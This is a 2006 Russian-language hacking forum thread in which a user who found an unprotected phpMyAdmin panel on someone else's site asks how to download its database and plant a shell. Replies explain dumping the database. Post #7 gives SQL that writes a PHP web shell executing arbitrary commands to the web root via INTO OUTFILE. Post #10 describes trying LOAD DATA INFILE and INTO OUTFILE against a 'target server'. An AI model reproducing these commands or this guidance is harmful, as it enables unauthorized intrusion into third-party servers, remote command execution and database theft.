ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Как залить шелл через PhpMyAdmin?
  #1  
Старый 15.02.2006, 01:01
Аватар для Buga
Buga
Познающий
Регистрация: 29.07.2005
Сообщений: 69
Провел на форуме:
177573

Репутация: 2
По умолчанию Как залить шелл через PhpMyAdmin?

не знал куда писать но напигу сюда.
кароче есть форум на сайте ну это фигня там другая фигня.. например:я пишу http://xxx.xxx.ru/admin/ он мне сразу зашол
[Добро пожаловать в phpMyAdmin 2.4.0

MySQL 4.1.11 на localhost как xxx@localhost] не попросил не каких паролей не чо как нибудь можно скачать БД ?
 

  #2  
Старый 15.02.2006, 01:12
Аватар для Ak3lla
Ak3lla
Новичок
Регистрация: 14.02.2006
Сообщений: 2
Провел на форуме:
29543

Репутация: 0
По умолчанию

Да, можно
 

  #3  
Старый 15.02.2006, 01:21
Аватар для Grrl
Grrl
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме:
560754

Репутация: 97
По умолчанию

ну это воще странно что тебя теда впустили без пасов.. повезло)
естественно имея доступ к pma можешь делать с базой что угодно редактировать таблицы и естествеено сделать дамп нужной базы.еще можно попробовать залить шел если прав хватит .
слева выбирааешь нужные базы и днлаешь дамп (экспорт).
 

  #4  
Старый 15.02.2006, 07:03
Аватар для qPhoenix
qPhoenix
Banned
Регистрация: 15.12.2005
Сообщений: 95
Провел на форуме:
1509352

Репутация: 132
Отправить сообщение для qPhoenix с помощью ICQ
По умолчанию

Цитата:
Сообщение от Grrl  
ну это воще странно что тебя теда впустили без пасов.. повезло)
естественно имея доступ к pma можешь делать с базой что угодно редактировать таблицы и естествеено сделать дамп нужной базы.еще можно попробовать залить шел если прав хватит .
слева выбирааешь нужные базы и днлаешь дамп (экспорт).
Прости, быть может не правильно понял смысл... через МиСКЛю можно лить шеллы? как?
 

  #5  
Старый 15.02.2006, 12:00
Аватар для podkashey
podkashey
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
Провел на форуме:
2821162

Репутация: 1320


По умолчанию

Цитата:
Прости, быть может не правильно понял смысл... через МиСКЛю можно лить шеллы? как?
Если ничего не путаю, то надо сделать дамп базы, изменить несколько (или даже одну) строк и залить обратно.
Если правильно понял твой вопрос.
 

  #6  
Старый 15.02.2006, 19:17
Аватар для Buga
Buga
Познающий
Регистрация: 29.07.2005
Сообщений: 69
Провел на форуме:
177573

Репутация: 2
Talking

блин я в этом phpAdmine не Шарю как там куда захадить то надо ?? там кароче с лева написано
БД отсутствуют и есть MySQL Создать новую БД и всякой разной Хрени как залить шел ?? поясните Ньюбу
 

  #7  
Старый 15.02.2006, 21:35
Аватар для virgoz
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию

2qPhoenix, Buga выполняем эти команды:
Цитата:
UPDATE table SET column='<? system("$cmd"); ?>' WHERE id='0';
SELECT name FROM table WHERE id='0' INTO OUTFILE '/path/to/file/shell.php';
UPDATE table SET column='nothing' WHERE id='0';
Шелл будет в /path/to/file/shell.php
 

  #8  
Старый 15.02.2006, 21:42
Аватар для Buga
Buga
Познающий
Регистрация: 29.07.2005
Сообщений: 69
Провел на форуме:
177573

Репутация: 2
По умолчанию

апять я запутался я же навичок.
где и как их выполнить ?
 

  #9  
Старый 16.02.2006, 02:31
Аватар для Grrl
Grrl
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме:
560754

Репутация: 97
По умолчанию

где выполнять? ну даешь... там в майадмине есть такая ссылка вверху "SQL"
жмешь ее потом откроется форма в ней пишешь sql запрос и внизу жмешь кнопку "пошел" или "submit" или чо там у теебя..

Последний раз редактировалось Grrl; 16.02.2006 в 02:33..
 

  #10  
Старый 16.02.2006, 10:27
Аватар для qPhoenix
qPhoenix
Banned
Регистрация: 15.12.2005
Сообщений: 95
Провел на форуме:
1509352

Репутация: 132
Отправить сообщение для qPhoenix с помощью ICQ
По умолчанию

WinXP, MySQL 4.1.18-nt, таблица 'lol' c текстовым столбцом 'txt', работаю MySQL Query Browser 1.1.20, админки нет (на целевом)
Пасяб virgoz за идею, правда всего так и не понял =)

Приступим:
Загоняем шелл в таблу: LOAD DATA INFILE 'e:/shell/nst.php' INTO TABLE lol; гуд! 2103 строк записано...
Вынимаем на локалхост: SELECT * FROM lol INTO OUTFILE 'd:/http/shell.php'; гуд! 2103 строк записано...
Запускаю - белый экран, исходный код - пусто...
Сравниваю шеллы:
Исходник - 82*940 байт/2103 строк
Созданый - 82*547 байт/2156 строк
пробую прогнать сие еще 3-4 раза и впадаю в отчаяние...

Плз, втолкуйте в чем ошибка, и желательно поскорее, бо на целевом серваке я тож пару раз проверил...

Последний раз редактировалось qPhoenix; 16.02.2006 в 10:30..
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Залить remview.php через phpMyAdmin Grom PHP, PERL, MySQL, JavaScript 8 05.02.2006 00:19
залить шелл через ipb 2.0.4 alakazam Форумы 4 16.11.2005 22:08
Залить шелл через подделку http запросов, на примере ipb 1.3 SURRENDER Форумы 25 13.04.2005 15:37
Как залить шелл через PhPBB SheFF Форумы 5 29.11.2004 01:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ